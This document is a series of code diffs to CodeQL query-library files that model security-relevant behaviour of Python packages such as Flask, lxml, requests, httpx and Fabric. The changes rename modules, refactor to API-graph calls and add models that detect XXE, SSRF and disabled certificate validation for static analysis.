.getMember(decoratorName)
.getAUse() and
this.asExpr() = function.getADecorator()
}
override Function getRequestHandler() { result = function }
override predicate csrfEnabled() { decoratorName in ["csrf_protect", "requires_csrf_token"] }
}
}

View File

@@ -24,7 +24,7 @@ private module FabricV1 {
API::Node fabric() { result = API::moduleImport("fabric") }
/** Provides models for the `fabric` module. */
module fabric {
module Fabric {
// -------------------------------------------------------------------------
// fabric.api
// -------------------------------------------------------------------------
@@ -32,7 +32,7 @@ private module FabricV1 {
API::Node api() { result = fabric().getMember("api") }
/** Provides models for the `fabric.api` module */
module api {
module Api {
/**
* A call to either
* - `fabric.api.local`
@@ -66,7 +66,7 @@ private module FabricV2 {
API::Node fabric() { result = API::moduleImport("fabric") }
/** Provides models for the `fabric` module. */
module fabric {
module Fabric {
// -------------------------------------------------------------------------
// fabric.connection
// -------------------------------------------------------------------------
@@ -74,13 +74,13 @@ private module FabricV2 {
API::Node connection() { result = fabric().getMember("connection") }
/** Provides models for the `fabric.connection` module */
module connection {
module Connection {
/**
* Provides models for the `fabric.connection.Connection` class
*
* See https://docs.fabfile.org/en/2.5/api/connection.html#fabric.connection.Connection.
*/
module Connection {
module ConnectionClass {
/** Gets a reference to the `fabric.connection.Connection` class. */
API::Node classRef() {
result = fabric().getMember("Connection")
@@ -155,7 +155,7 @@ private module FabricV2 {
private class FabricConnectionRunSudoLocalCall extends SystemCommandExecution::Range,
DataFlow::CallCfgNode {
FabricConnectionRunSudoLocalCall() {
this.getFunction() = fabric::connection::Connection::instanceRunMethods()
this.getFunction() = Fabric::Connection::ConnectionClass::instanceRunMethods()
}
override DataFlow::Node getCommand() {
@@ -170,16 +170,16 @@ private module FabricV2 {
API::Node tasks() { result = fabric().getMember("tasks") }
/** Provides models for the `fabric.tasks` module */
module tasks {
module Tasks {
/** Gets a reference to the `fabric.tasks.task` decorator. */
API::Node task() { result in [tasks().getMember("task"), fabric().getMember("task")] }
}
class FabricTaskFirstParamConnectionInstance extends fabric::connection::Connection::InstanceSource,
class FabricTaskFirstParamConnectionInstance extends Fabric::Connection::ConnectionClass::InstanceSource,
DataFlow::ParameterNode {
FabricTaskFirstParamConnectionInstance() {
exists(Function func |
func.getADecorator() = fabric::tasks::task().getAUse().asExpr() and
func.getADecorator() = Fabric::Tasks::task().getAUse().asExpr() and
this.getParameter() = func.getArg(0)
)
}
@@ -192,7 +192,7 @@ private module FabricV2 {
API::Node group() { result = fabric().getMember("group") }
/** Provides models for the `fabric.group` module */
module group {
module Group {
/**
* Provides models for the `fabric.group.Group` class and its subclasses.
*
@@ -204,7 +204,7 @@ private module FabricV2 {
* - https://docs.fabfile.org/en/2.5/api/group.html#fabric.group.SerialGroup
* - https://docs.fabfile.org/en/2.5/api/group.html#fabric.group.ThreadingGroup
*/
module Group {
module GroupClass {
/**
* A source of instances of a subclass of `fabric.group, extend this class to model new instances.Group`
*
@@ -236,7 +236,9 @@ private module FabricV2 {
* See https://docs.fabfile.org/en/2.5/api/group.html#fabric.group.Group.run
*/
private class FabricGroupRunCall extends SystemCommandExecution::Range, DataFlow::CallCfgNode {
FabricGroupRunCall() { this = fabric::group::Group::subclassInstanceRunMethod().getACall() }
FabricGroupRunCall() {
this = Fabric::Group::GroupClass::subclassInstanceRunMethod().getACall()
}
override DataFlow::Node getCommand() {
result = [this.getArg(0), this.getArgByName("command")]
@@ -249,7 +251,7 @@ private module FabricV2 {
* See https://docs.fabfile.org/en/2.5/api/group.html#fabric.group.SerialGroup.
*/
module SerialGroup {
private class ClassInstantiation extends Group::ModeledSubclass {
private class ClassInstantiation extends GroupClass::ModeledSubclass {
ClassInstantiation() {
this = group().getMember("SerialGroup")
or
@@ -264,7 +266,7 @@ private module FabricV2 {
* See https://docs.fabfile.org/en/2.5/api/group.html#fabric.group.ThreadingGroup.
*/
module ThreadingGroup {
private class ClassInstantiation extends Group::ModeledSubclass {
private class ClassInstantiation extends GroupClass::ModeledSubclass {
ClassInstantiation() {
this = group().getMember("ThreadingGroup")
or

View File

@@ -30,13 +30,16 @@ private module FastApi {
*
* See https://fastapi.tiangolo.com/tutorial/bigger-applications/.
*/
module APIRouter {
/** Gets a reference to an instance of `fastapi.APIRouter`. */
module ApiRouter {
/** Gets a reference to an instance of `fastapi.ApiRouter`. */
API::Node instance() {
result = API::moduleImport("fastapi").getMember("APIRouter").getASubclass*().getReturn()
}
}
/** DEPRECATED: Alias for ApiRouter */
deprecated module APIRouter = ApiRouter;
// ---------------------------------------------------------------------------
// routing modeling
// ---------------------------------------------------------------------------
@@ -54,7 +57,7 @@ private module FastApi {
|
this = App::instance().getMember(routeAddingMethod).getACall()
or
this = APIRouter::instance().getMember(routeAddingMethod).getACall()
this = ApiRouter::instance().getMember(routeAddingMethod).getACall()
)
}

View File

@@ -122,7 +122,9 @@ module Flask {
private class ClassInstantiation extends InstanceSource, DataFlow::CallCfgNode {
ClassInstantiation() { this = classRef().getACall() }
override DataFlow::Node getBody() { result = this.getArg(0) }
override DataFlow::Node getBody() {
result in [this.getArg(0), this.getArgByName("response")]
}
override string getMimetypeDefault() { result = "text/html" }
@@ -192,8 +194,8 @@ module Flask {
API::Node api_node;
FlaskViewClass() {
this.getABase() = Views::View::subclassRef().getAUse().asExpr() and
api_node.getAnImmediateUse().asExpr().(ClassExpr) = this.getParent()
api_node = Views::View::subclassRef() and
this.getParent() = api_node.getAnImmediateUse().asExpr()
}
/** Gets a function that could handle incoming requests, if any. */
@@ -217,8 +219,8 @@ module Flask {
*/
class FlaskMethodViewClass extends FlaskViewClass {
FlaskMethodViewClass() {
this.getABase() = Views::MethodView::subclassRef().getAUse().asExpr() and
api_node.getAnImmediateUse().asExpr().(ClassExpr) = this.getParent()
api_node = Views::MethodView::subclassRef() and
this.getParent() = api_node.getAnImmediateUse().asExpr()
}
override Function getARequestHandler() {
@@ -299,7 +301,7 @@ module Flask {
override Function getARequestHandler() {
exists(DataFlow::LocalSourceNode func_src |
func_src.flowsTo(this.getViewArg()) and
func_src.asExpr().(CallableExpr) = result.getDefinition()
func_src.asExpr() = result.getDefinition()
)
or
exists(FlaskViewClass vc |
@@ -401,47 +403,37 @@ module Flask {
}
private class RequestAttrMultiDict extends Werkzeug::MultiDict::InstanceSource {
string attr_name;
RequestAttrMultiDict() {
attr_name in ["args", "values", "form", "files"] and
this.(DataFlow::AttrRead).accesses(request().getAUse(), attr_name)
this = request().getMember(["args", "values", "form", "files"]).getAnImmediateUse()
}
}
/** An `FileStorage` instance that originates from a flask request. */
private class FlaskRequestFileStorageInstances extends Werkzeug::FileStorage::InstanceSource {
FlaskRequestFileStorageInstances() {
// TODO: this currently only works in local-scope, since writing type-trackers for
// this is a little too much effort. Once API-graphs are available for more
// things, we can rewrite this.
//
// TODO: This approach for identifying member-access is very adhoc, and we should
// be able to do something more structured for providing modeling of the members
// of a container-object.
exists(DataFlow::AttrRead files | files.accesses(request().getAUse(), "files") |
this.asCfgNode().(SubscriptNode).getObject() = files.asCfgNode()
exists(API::Node files | files = request().getMember("files") |
this.asCfgNode().(SubscriptNode).getObject() = files.getAUse().asCfgNode()
or
this.(DataFlow::MethodCallNode).calls(files, "get")
this = files.getMember("get").getACall()
or
exists(DataFlow::MethodCallNode getlistCall | getlistCall.calls(files, "getlist") |
this.asCfgNode().(SubscriptNode).getObject() = getlistCall.asCfgNode()
)
this.asCfgNode().(SubscriptNode).getObject() =
files.getMember("getlist").getReturn().getAUse().asCfgNode()
)
}
}
/** An `Headers` instance that originates from a flask request. */
private class FlaskRequestHeadersInstances extends Werkzeug::Headers::InstanceSource {
FlaskRequestHeadersInstances() {
this.(DataFlow::AttrRead).accesses(request().getAUse(), "headers")
}
FlaskRequestHeadersInstances() { this = request().getMember("headers").getAnImmediateUse() }
}
/** An `Authorization` instance that originates from a flask request. */
private class FlaskRequestAuthorizationInstances extends Werkzeug::Authorization::InstanceSource {
FlaskRequestAuthorizationInstances() {
this.(DataFlow::AttrRead).accesses(request().getAUse(), "authorization")
this = request().getMember("authorization").getAnImmediateUse()
}
}

View File

@@ -35,7 +35,7 @@ private module FlaskSqlAlchemy {
/** Access on a DB resulting in an Engine */
private class DbEngine extends SqlAlchemy::Engine::InstanceSource {
DbEngine() {
this = dbInstance().getMember("engine").getAUse()
this = dbInstance().getMember("engine").getAnImmediateUse()
or
this = dbInstance().getMember("get_engine").getACall()
}
@@ -44,7 +44,7 @@ private module FlaskSqlAlchemy {
/** Access on a DB resulting in a Session */
private class DbSession extends SqlAlchemy::Session::InstanceSource {
DbSession() {
this = dbInstance().getMember("session").getAUse()
this = dbInstance().getMember("session").getAnImmediateUse()
or
this = dbInstance().getMember("create_session").getReturn().getACall()
or

View File

@@ -0,0 +1,88 @@
/**
* Provides classes modeling security-relevant aspects of the `httpx` PyPI package.
*
* See
* - https://pypi.org/project/httpx/
* - https://www.python-httpx.org/
*/
private import python
private import semmle.python.Concepts
private import semmle.python.ApiGraphs
/**
* Provides models for the `httpx` PyPI package.
*
* See
* - https://pypi.org/project/httpx/
* - https://www.python-httpx.org/
*/
private module HttpxModel {
private class RequestCall extends HTTP::Client::Request::Range, DataFlow::CallCfgNode {
string methodName;
RequestCall() {
methodName in [HTTP::httpVerbLower(), "request", "stream"] and
this = API::moduleImport("httpx").getMember(methodName).getACall()
}
override DataFlow::Node getAUrlPart() {
result = this.getArgByName("url")
or
if methodName in ["request", "stream"]
then result = this.getArg(1)
else result = this.getArg(0)
}
override string getFramework() { result = "httpx" }
override predicate disablesCertificateValidation(
DataFlow::Node disablingNode, DataFlow::Node argumentOrigin
) {
// TODO: Look into disabling certificate validation
none()
}
}
/**
* Provides models for the `httpx.[Async]Client` class
*
* See https://www.python-httpx.org/async/
*/
module Client {
/** Get a reference to the `httpx.Client` or `httpx.AsyncClient` class. */
private API::Node classRef() {
result = API::moduleImport("httpx").getMember(["Client", "AsyncClient"])
}
/** Get a reference to an `httpx.Client` or `httpx.AsyncClient` instance. */
private API::Node instance() { result = classRef().getReturn() }
/** A method call on a Client that sends off a request */
private class OutgoingRequestCall extends HTTP::Client::Request::Range, DataFlow::CallCfgNode {
string methodName;
OutgoingRequestCall() {
methodName in [HTTP::httpVerbLower(), "request", "stream"] and
this = instance().getMember(methodName).getACall()
}
override DataFlow::Node getAUrlPart() {
result = this.getArgByName("url")
or
if methodName in ["request", "stream"]
then result = this.getArg(1)
else result = this.getArg(0)
}
override string getFramework() { result = "httpx.[Async]Client" }
override predicate disablesCertificateValidation(
DataFlow::Node disablingNode, DataFlow::Node argumentOrigin
) {
// TODO: Look into disabling certificate validation
none()
}
}
}
}

View File

@@ -20,14 +20,11 @@ private module Invoke {
API::Node invoke() { result = API::moduleImport("invoke") }
/** Provides models for the `invoke` module. */
module invoke {
/** Gets a reference to the `invoke.context` module. */
API::Node context() { result = invoke().getMember("context") }
module InvokeModule {
/** Provides models for the `invoke.context` module */
module context {
module Context {
/** Provides models for the `invoke.context.Context` class */
module Context {
module ContextClass {
/** Gets a reference to the `invoke.context.Context` class. */
API::Node classRef() {
result = API::moduleImport("invoke").getMember("context").getMember("Context")
@@ -39,7 +36,7 @@ private module Invoke {
private DataFlow::TypeTrackingNode instance(DataFlow::TypeTracker t) {
t.start() and
(
result = invoke::context::Context::classRef().getACall()
result = InvokeModule::Context::ContextClass::classRef().getACall()
or
exists(Function func |
func.getADecorator() = invoke().getMember("task").getAUse().asExpr() and
@@ -56,7 +53,7 @@ private module Invoke {
/** Gets a reference to the `run` or `sudo` methods on a `invoke.context.Context` instance. */
private DataFlow::TypeTrackingNode instanceRunMethods(DataFlow::TypeTracker t) {
t.startInAttr(["run", "sudo"]) and
result = invoke::context::Context::instance()
result = InvokeModule::Context::ContextClass::instance()
or
exists(DataFlow::TypeTracker t2 | result = instanceRunMethods(t2).track(t2, t))
}
@@ -77,7 +74,7 @@ private module Invoke {
private class InvokeRunCommandCall extends SystemCommandExecution::Range, DataFlow::CallCfgNode {
InvokeRunCommandCall() {
this = invoke().getMember(["run", "sudo"]).getACall() or
this.getFunction() = invoke::context::Context::instanceRunMethods()
this.getFunction() = InvokeModule::Context::ContextClass::instanceRunMethods()
}
override DataFlow::Node getCommand() {

View File

@@ -0,0 +1,42 @@
/**
* Provides classes modeling security-relevant aspects of the `libtaxii` PyPI package.
*
* See
* - https://pypi.org/project/libtaxii/
* - https://github.com/TAXIIProject/libtaxii
*/
private import python
private import semmle.python.Concepts
private import semmle.python.ApiGraphs
/**
* Provides models for the `libtaxii` PyPI package.
*
* See
* - https://pypi.org/project/libtaxii/
* - https://github.com/TAXIIProject/libtaxii
*/
private module Libtaxii {
/**
* A call to `libtaxii.common.parse`.
* When the `allow_url` parameter value is set to `True`, there is an SSRF vulnerability..
*/
private class ParseCall extends HTTP::Client::Request::Range, DataFlow::CallCfgNode {
ParseCall() {
this = API::moduleImport("libtaxii").getMember("common").getMember("parse").getACall() and
this.getArgByName("allow_url").getALocalSource().asExpr() = any(True t)
}
override DataFlow::Node getAUrlPart() { result in [this.getArg(0), this.getArgByName("s")] }
override string getFramework() { result = "libtaxii.common.parse" }
override predicate disablesCertificateValidation(
DataFlow::Node disablingNode, DataFlow::Node argumentOrigin
) {
// TODO: Look into disabling certificate validation
none()
}
}
}

View File

@@ -0,0 +1,45 @@
/**
* Provides classes modeling security-relevant aspects of the `libxml2` PyPI package.
*
* See
* - https://pypi.org/project/libxml2-python3/
* - http://xmlsoft.org/python.html
*/
private import python
private import semmle.python.dataflow.new.DataFlow
private import semmle.python.Concepts
private import semmle.python.ApiGraphs
/**
* Provides classes modeling security-relevant aspects of the `libxml2` PyPI package
*
* See
* - https://pypi.org/project/libxml2-python3/
* - http://xmlsoft.org/python.html
*/
private module Libxml2 {
/**
* A call to the `xpathEval` method of a parsed document.
*
* import libxml2
* tree = libxml2.parseFile("file.xml")
* r = tree.xpathEval('`sink`')
*
* See http://xmlsoft.org/python.html
*/
class XpathEvalCall extends XML::XPathExecution::Range, DataFlow::CallCfgNode {
XpathEvalCall() {
this =
API::moduleImport("libxml2")
.getMember("parseFile")
.getReturn()
.getMember("xpathEval")
.getACall()
}
override DataFlow::Node getXPath() { result = this.getArg(0) }
override string getName() { result = "libxml2" }
}
}

View File

@@ -0,0 +1,334 @@
/**
* Provides classes modeling security-relevant aspects of the `lxml` PyPI package.
*
* See
* - https://pypi.org/project/lxml/
* - https://lxml.de/tutorial.html
*/
private import python
private import semmle.python.dataflow.new.DataFlow
private import semmle.python.Concepts
private import semmle.python.ApiGraphs
/**
* Provides classes modeling security-relevant aspects of the `lxml` PyPI package
*
* See
* - https://pypi.org/project/lxml/
* - https://lxml.de/tutorial.html
*/
private module Lxml {
// ---------------------------------------------------------------------------
// XPath
// ---------------------------------------------------------------------------
/**
* A class constructor compiling an XPath expression.
*
* from lxml import etree
* find_text = etree.XPath("`sink`")
* find_text = etree.ETXPath("`sink`")
*
* See
* - https://lxml.de/apidoc/lxml.etree.html#lxml.etree.XPath
* - https://lxml.de/apidoc/lxml.etree.html#lxml.etree.ETXPath
*/
private class XPathClassCall extends XML::XPathConstruction::Range, DataFlow::CallCfgNode {
XPathClassCall() {
this = API::moduleImport("lxml").getMember("etree").getMember(["XPath", "ETXPath"]).getACall()
}
override DataFlow::Node getXPath() { result in [this.getArg(0), this.getArgByName("path")] }
override string getName() { result = "lxml.etree" }
}
/**
* A call to the `xpath` method of a parsed document.
*
* from lxml import etree
* root = etree.fromstring(file(XML_DB).read(), XMLParser())
* find_text = root.xpath("`sink`")
*
* See https://lxml.de/apidoc/lxml.etree.html#lxml.etree._ElementTree.xpath
* as well as
* - https://lxml.de/apidoc/lxml.etree.html#lxml.etree.parse
* - https://lxml.de/apidoc/lxml.etree.html#lxml.etree.fromstring
* - https://lxml.de/apidoc/lxml.etree.html#lxml.etree.fromstringlist
* - https://lxml.de/apidoc/lxml.etree.html#lxml.etree.HTML
* - https://lxml.de/apidoc/lxml.etree.html#lxml.etree.XML
*/
class XPathCall extends XML::XPathExecution::Range, DataFlow::CallCfgNode {
XPathCall() {
exists(API::Node parseResult |
parseResult =
API::moduleImport("lxml")
.getMember("etree")
.getMember(["parse", "fromstring", "fromstringlist", "HTML", "XML"])
.getReturn()
or
// TODO: lxml.etree.parseid(<text>)[0] will contain the root element from parsing <text>
// but we don't really have a way to model that nicely.
parseResult =
API::moduleImport("lxml")
.getMember("etree")
.getMember("XMLParser")
.getReturn()
.getMember("close")
.getReturn()
|
this = parseResult.getMember("xpath").getACall()
)
}
override DataFlow::Node getXPath() { result in [this.getArg(0), this.getArgByName("_path")] }
override string getName() { result = "lxml.etree" }
}
class XPathEvaluatorCall extends XML::XPathExecution::Range, DataFlow::CallCfgNode {
XPathEvaluatorCall() {
this =
API::moduleImport("lxml")
.getMember("etree")
.getMember("XPathEvaluator")
.getReturn()
.getACall()
}
override DataFlow::Node getXPath() { result = this.getArg(0) }
override string getName() { result = "lxml.etree" }
}
// ---------------------------------------------------------------------------
// Parsing
// ---------------------------------------------------------------------------
/**
* Provides models for `lxml.etree` parsers.
*
* See https://lxml.de/apidoc/lxml.etree.html?highlight=xmlparser#lxml.etree.XMLParser
*/
module XmlParser {
/**
* A source of instances of `lxml.etree` parsers, extend this class to model new instances.
*
* This can include instantiations of the class, return values from function
* calls, or a special parameter that will be set when functions are called by an external
* library.
*
* Use the predicate `XmlParser::instance()` to get references to instances of `lxml.etree` parsers.
*/
abstract class InstanceSource extends DataFlow::LocalSourceNode {
/** Holds if this instance is vulnerable to `kind`. */
abstract predicate vulnerableTo(XML::XmlParsingVulnerabilityKind kind);
}
/**
* A call to `lxml.etree.XMLParser`.
*
* See https://lxml.de/apidoc/lxml.etree.html?highlight=xmlparser#lxml.etree.XMLParser
*/
private class LxmlParser extends InstanceSource, API::CallNode {
LxmlParser() {
this = API::moduleImport("lxml").getMember("etree").getMember("XMLParser").getACall()
}
// NOTE: it's not possible to change settings of a parser after constructing it
override predicate vulnerableTo(XML::XmlParsingVulnerabilityKind kind) {
kind.isXxe() and
(
// resolve_entities has default True
not exists(this.getArgByName("resolve_entities"))
or
this.getKeywordParameter("resolve_entities").getAValueReachingRhs().asExpr() = any(True t)
)
or
kind.isXmlBomb() and
this.getKeywordParameter("huge_tree").getAValueReachingRhs().asExpr() = any(True t) and
not this.getKeywordParameter("resolve_entities").getAValueReachingRhs().asExpr() =
any(False t)
or
kind.isDtdRetrieval() and
this.getKeywordParameter("load_dtd").getAValueReachingRhs().asExpr() = any(True t) and
this.getKeywordParameter("no_network").getAValueReachingRhs().asExpr() = any(False t)
}
}
/**
* A call to `lxml.etree.get_default_parser`.
*
* See https://lxml.de/apidoc/lxml.etree.html?highlight=xmlparser#lxml.etree.get_default_parser
*/
private class LxmlDefaultParser extends InstanceSource, DataFlow::CallCfgNode {
LxmlDefaultParser() {
this =
API::moduleImport("lxml").getMember("etree").getMember("get_default_parser").getACall()
}
override predicate vulnerableTo(XML::XmlParsingVulnerabilityKind kind) {
// as highlighted by
// https://lxml.de/apidoc/lxml.etree.html?highlight=xmlparser#lxml.etree.XMLParser
// by default XXE is allow. so as long as the default parser has not been
// overridden, the result is also vuln to XXE.
kind.isXxe()
// TODO: take into account that you can override the default parser with `lxml.etree.set_default_parser`.
}
}
/** Gets a reference to an `lxml.etree` parsers instance, with origin in `origin` */
private DataFlow::TypeTrackingNode instance(DataFlow::TypeTracker t, InstanceSource origin) {
t.start() and
result = origin
or
exists(DataFlow::TypeTracker t2 | result = instance(t2, origin).track(t2, t))
}
/** Gets a reference to an `lxml.etree` parsers instance, with origin in `origin` */
DataFlow::Node instance(InstanceSource origin) {
instance(DataFlow::TypeTracker::end(), origin).flowsTo(result)
}
/** Gets a reference to an `lxml.etree` parser instance, that is vulnerable to `kind`. */
DataFlow::Node instanceVulnerableTo(XML::XmlParsingVulnerabilityKind kind) {
exists(InstanceSource origin | result = instance(origin) and origin.vulnerableTo(kind))
}
/**
* A call to the `feed` method of an `lxml` parser.
*/
private class LxmlParserFeedCall extends DataFlow::MethodCallNode, XML::XmlParsing::Range {
LxmlParserFeedCall() { this.calls(instance(_), "feed") }
override DataFlow::Node getAnInput() { result in [this.getArg(0), this.getArgByName("data")] }
override predicate vulnerableTo(XML::XmlParsingVulnerabilityKind kind) {
this.calls(instanceVulnerableTo(kind), "feed")
}
override predicate mayExecuteInput() { none() }
override DataFlow::Node getOutput() {
exists(DataFlow::Node objRef |
DataFlow::localFlow(this.getObject(), objRef) and
result.(DataFlow::MethodCallNode).calls(objRef, "close")
)
}
}
}
/**
* A call to either of:
* - `lxml.etree.fromstring`
* - `lxml.etree.fromstringlist`
* - `lxml.etree.XML`
* - `lxml.etree.XMLID`
* - `lxml.etree.parse`
* - `lxml.etree.parseid`
*
* See
* - https://lxml.de/apidoc/lxml.etree.html?highlight=parseids#lxml.etree.fromstring
* - https://lxml.de/apidoc/lxml.etree.html?highlight=parseids#lxml.etree.fromstringlist
* - https://lxml.de/apidoc/lxml.etree.html?highlight=parseids#lxml.etree.XML
* - https://lxml.de/apidoc/lxml.etree.html?highlight=parseids#lxml.etree.XMLID
* - https://lxml.de/apidoc/lxml.etree.html?highlight=parseids#lxml.etree.parse
* - https://lxml.de/apidoc/lxml.etree.html?highlight=parseids#lxml.etree.parseid
*/
private class LxmlParsing extends DataFlow::CallCfgNode, XML::XmlParsing::Range {
string functionName;
LxmlParsing() {
functionName in ["fromstring", "fromstringlist", "XML", "XMLID", "parse", "parseid"] and
this = API::moduleImport("lxml").getMember("etree").getMember(functionName).getACall()
}
override DataFlow::Node getAnInput() {
result in [
this.getArg(0),
// fromstring / XML / XMLID
this.getArgByName("text"),
// fromstringlist
this.getArgByName("strings"),
// parse / parseid
this.getArgByName("source"),
]
}
DataFlow::Node getParserArg() { result in [this.getArg(1), this.getArgByName("parser")] }
override predicate vulnerableTo(XML::XmlParsingVulnerabilityKind kind) {
this.getParserArg() = XmlParser::instanceVulnerableTo(kind)
or
kind.isXxe() and
not exists(this.getParserArg())
}
override predicate mayExecuteInput() { none() }
override DataFlow::Node getOutput() {
// Note: for `parseid`/XMLID the result of the call is a tuple with `(root, dict)`, so
// maybe we should not just say that the entire tuple is the decoding output... my
// gut feeling is that THIS instance doesn't matter too much, but that it would be
// nice to be able to do this in general. (this is a problem for both `lxml.etree`
// and `xml.etree`)
result = this
}
}
/**
* A call to `lxml.etree.ElementTree.parse` or `lxml.etree.ElementTree.parseid`, which
* takes either a filename or a file-like object as argument. To capture the filename
* for path-injection, we have this subclass.
*
* See
* - https://lxml.de/apidoc/lxml.etree.html?highlight=parseids#lxml.etree.parse
* - https://lxml.de/apidoc/lxml.etree.html?highlight=parseids#lxml.etree.parseid
*/
private class FileAccessFromLxmlParsing extends LxmlParsing, FileSystemAccess::Range {
FileAccessFromLxmlParsing() {
functionName in ["parse", "parseid"]
// I considered whether we should try to reduce FPs from people passing file-like
// objects, which will not be a file system access (and couldn't cause a
// path-injection).
//
// I suppose that once we have proper flow-summary support for file-like objects,
// we can make the XXE/XML-bomb sinks allow an access-path, while the
// path-injection sink wouldn't, and then we will not end up with such FPs.
}
override DataFlow::Node getAPathArgument() { result = this.getAnInput() }
}
/**
* A call to `lxml.etree.iterparse`
*
* See
* - https://lxml.de/apidoc/lxml.etree.html?highlight=parseids#lxml.etree.iterparse
*/
private class LxmlIterparseCall extends API::CallNode, XML::XmlParsing::Range,
FileSystemAccess::Range {
LxmlIterparseCall() {
this = API::moduleImport("lxml").getMember("etree").getMember("iterparse").getACall()
}
override DataFlow::Node getAnInput() { result in [this.getArg(0), this.getArgByName("source")] }
override predicate vulnerableTo(XML::XmlParsingVulnerabilityKind kind) {
// note that there is no `resolve_entities` argument, so it's not possible to turn off XXE :O
kind.isXxe()
or
kind.isXmlBomb() and
this.getKeywordParameter("huge_tree").getAValueReachingRhs().asExpr() = any(True t)
or
kind.isDtdRetrieval() and
this.getKeywordParameter("load_dtd").getAValueReachingRhs().asExpr() = any(True t) and
this.getKeywordParameter("no_network").getAValueReachingRhs().asExpr() = any(False t)
}
override predicate mayExecuteInput() { none() }
override DataFlow::Node getOutput() { result = this }
override DataFlow::Node getAPathArgument() { result = this.getAnInput() }
}
}

View File

@@ -27,7 +27,10 @@ private module MySQLdb {
// ---------------------------------------------------------------------------
// MySQLdb
// ---------------------------------------------------------------------------
/** MySQLdb implements PEP 249, providing ways to execute SQL statements against a database. */
/**
* A model for MySQLdb as a module that implements PEP 249, providing ways to execute SQL statements
* against a database.
*/
class MySQLdb extends PEP249::PEP249ModuleApiNode {
MySQLdb() { this = API::moduleImport("MySQLdb") }
}

View File

@@ -25,7 +25,7 @@ private module Mysql {
// mysql
// ---------------------------------------------------------------------------
/** Provides models for the `mysql` module. */
module mysql {
module MysqlMod {
/**
* The mysql.connector module
* See https://dev.mysql.com/doc/connector-python/en/connector-python-example-connecting.html

View File

@@ -22,7 +22,10 @@ private module Psycopg2 {
// ---------------------------------------------------------------------------
// Psycopg
// ---------------------------------------------------------------------------
/** psycopg2 implements PEP 249, providing ways to execute SQL statements against a database. */
/**
* A model of psycopg2 as a module that implements PEP 249, providing ways to execute SQL statements
* against a database.
*/
class Psycopg2 extends PEP249::PEP249ModuleApiNode {
Psycopg2() { this = API::moduleImport("psycopg2") }
}

View File

@@ -14,8 +14,11 @@ private import semmle.python.frameworks.PEP249
* Provides models for the `PyMySQL` PyPI package.
* See https://pypi.org/project/PyMySQL/
*/
private module PyMySQL {
/** PyMySQL implements PEP 249, providing ways to execute SQL statements against a database. */
private module PyMySql {
/**
* A model of PyMySQL as a module that implements PEP 249, providing ways to execute SQL statements
* against a database.
*/
class PyMySQLPEP249 extends PEP249::PEP249ModuleApiNode {
PyMySQLPEP249() { this = API::moduleImport("pymysql") }
}

View File

@@ -0,0 +1,59 @@
/**
* Provides classes modeling security-relevant aspects of the `pycurl` PyPI package.
*
* See
* - https://pypi.org/project/pycurl/
* - https://pycurl.io/docs/latest/
*/
private import python
private import semmle.python.Concepts
private import semmle.python.ApiGraphs
/**
* Provides models for the `pycurl` PyPI package.
*
* See
* - https://pypi.org/project/pycurl/
* - https://pycurl.io/docs/latest/
*/
private module Pycurl {
/**
* Provides models for the `pycurl.Curl` class
*
* See https://pycurl.io/docs/latest/curl.html.
*/
module Curl {
/** Gets a reference to the `pycurl.Curl` class. */
private API::Node classRef() { result = API::moduleImport("pycurl").getMember("Curl") }
/** Gets a reference to an instance of `pycurl.Curl`. */
private API::Node instance() { result = classRef().getReturn() }
/**
* When the first parameter value of the `setopt` function is set to `pycurl.URL`,
* the second parameter value is the request resource link.
*
* See http://pycurl.io/docs/latest/curlobject.html#pycurl.Curl.setopt.
*/
private class OutgoingRequestCall extends HTTP::Client::Request::Range, DataFlow::CallCfgNode {
OutgoingRequestCall() {
this = instance().getMember("setopt").getACall() and
this.getArg(0).asCfgNode().(AttrNode).getName() = "URL"
}
override DataFlow::Node getAUrlPart() {
result in [this.getArg(1), this.getArgByName("value")]
}
override string getFramework() { result = "pycurl.Curl" }
override predicate disablesCertificateValidation(
DataFlow::Node disablingNode, DataFlow::Node argumentOrigin
) {
// TODO: Look into disabling certificate validation
none()
}
}
}
}

View File

@@ -9,7 +9,6 @@
private import python
private import semmle.python.Concepts
private import semmle.python.ApiGraphs
private import semmle.python.dataflow.new.DataFlow
private import semmle.python.dataflow.new.TaintTracking
private import semmle.python.frameworks.internal.InstanceTaintStepsHelper
private import semmle.python.frameworks.Stdlib
@@ -24,7 +23,7 @@ private import semmle.python.frameworks.Stdlib
* - https://docs.python-requests.org/en/latest/
*/
private module Requests {
private class OutgoingRequestCall extends HTTP::Client::Request::Range, DataFlow::CallCfgNode {
private class OutgoingRequestCall extends HTTP::Client::Request::Range, API::CallNode {
string methodName;
OutgoingRequestCall() {
@@ -54,14 +53,11 @@ private module Requests {
result = this.getArg(1)
}
/** Gets the `verify` argument to this outgoing requests call. */
DataFlow::Node getVerifyArg() { result = this.getArgByName("verify") }
override predicate disablesCertificateValidation(
DataFlow::Node disablingNode, DataFlow::Node argumentOrigin
) {
disablingNode = this.getVerifyArg() and
argumentOrigin = verifyArgBacktracker(disablingNode) and
disablingNode = this.getKeywordParameter("verify").getARhs() and
argumentOrigin = this.getKeywordParameter("verify").getAValueReachingRhs() and
argumentOrigin.asExpr().(ImmutableLiteral).booleanValue() = false and
not argumentOrigin.asExpr() instanceof None
}
@@ -79,22 +75,6 @@ private module Requests {
}
}
/** Gets a back-reference to the verify argument `arg`. */
private DataFlow::TypeTrackingNode verifyArgBacktracker(
DataFlow::TypeBackTracker t, DataFlow::Node arg
) {
t.start() and
arg = any(OutgoingRequestCall c).getVerifyArg() and
result = arg.getALocalSource()
or
exists(DataFlow::TypeBackTracker t2 | result = verifyArgBacktracker(t2, arg).backtrack(t2, t))
}
/** Gets a back-reference to the verify argument `arg`. */
private DataFlow::LocalSourceNode verifyArgBacktracker(DataFlow::Node arg) {
result = verifyArgBacktracker(DataFlow::TypeBackTracker::end(), arg)
}
// ---------------------------------------------------------------------------
// Response
// ---------------------------------------------------------------------------

View File

@@ -115,7 +115,7 @@ private module RestFramework {
*/
class RestFrameworkApiViewClass extends PrivateDjango::DjangoViewClassFromSuperClass {
RestFrameworkApiViewClass() {
this.getABase() = any(ModeledApiViewClasses c).getASubclass*().getAUse().asExpr()
this.getParent() = any(ModeledApiViewClasses c).getASubclass*().getAnImmediateUse().asExpr()
}
override Function getARequestHandler() {
@@ -220,7 +220,7 @@ private module RestFramework {
*
* Use the predicate `Request::instance()` to get references to instances of `rest_framework.request.Request`.
*/
abstract class InstanceSource extends PrivateDjango::django::http::request::HttpRequest::InstanceSource {
abstract class InstanceSource extends PrivateDjango::DjangoImpl::Http::Request::HttpRequest::InstanceSource {
}
